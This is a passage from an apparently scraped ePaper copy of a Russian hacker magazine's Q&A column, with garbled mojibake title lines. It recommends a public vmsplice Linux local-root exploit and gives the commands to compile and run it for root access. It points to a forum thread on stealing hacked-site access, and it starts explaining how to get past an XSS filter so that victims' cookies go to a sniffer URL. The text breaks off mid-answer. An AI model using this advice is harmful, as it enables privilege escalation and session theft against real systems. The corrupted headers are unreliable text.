ÞфøÑÂýþõ ÷ðÿðôûþ - Xakep Online
ÞфøÑÂýþõ ÷ðÿðôûþ - Xakep Online
ÞфøÑÂýþõ ÷ðÿðôûþ - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
units<br />
месте тут же появится другой. Немного информации по теме кражи доров<br />
ты сможешь найти тут: http://forum.glavmed.com/showthread.phpt=1342<br />
Q: Какой local root exploit под не самые старые ядра linux можешь<br />
посоветовать, как самый эффективный<br />
A: По долгу службы я чаще всего сталкиваюсь с ядрами 2.6.2x ветки. Под<br />
них существует несколько паблик сплойтов, но моим любимым является<br />
Linux Kernel 2.6.17 — 2.6.24.1 vmsplice Local Root Exploit (http://<br />
milw0rm.com/exploits/5092). С ним я получаю рут в два шага:<br />
1) компилю gcc -static -Wno-format -O2 vmsplice.c -o vmsplice;<br />
2) запускаю (./vmsplice), жду 2 секунды и наслаждаюсь правами рута :).<br />
Q: Нашел XSS на серьезном сервисе, но все нехорошие символы,<br />
кроме < и >, жестко фильтруются, как быть<br />
A: Тоже недавно столкнулся с этим вопросом и придумал элегантное<br />
решение с объединением массивов и функции fromCharCode() в<br />
javascript. Смотри. У нас имеется адрес сниффера, который отлавливает<br />
приходящие на него кукисы, например http://snif.com/sniffer.phpid=[тут<br />
передаются куки]. Засовываем этот адрес в нехитрый php-скрипт:<br />